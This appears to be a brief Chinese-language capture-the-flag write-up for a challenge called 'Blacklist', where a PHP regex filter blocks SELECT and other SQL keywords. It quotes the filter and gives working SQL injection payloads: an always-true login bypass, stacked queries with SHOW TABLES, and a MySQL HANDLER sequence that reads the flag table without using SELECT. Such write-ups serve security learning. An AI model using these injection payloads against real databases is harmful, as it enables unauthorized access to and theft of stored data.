Blacklist
万能钥匙穿了
1' or '1'='1'#
上select被过滤了
return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);
感觉很像强网杯的随便注(看了一下就是),然后就是堆叠注入了。
1';show tables;#
1';
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;
#
Last modified 8mo ago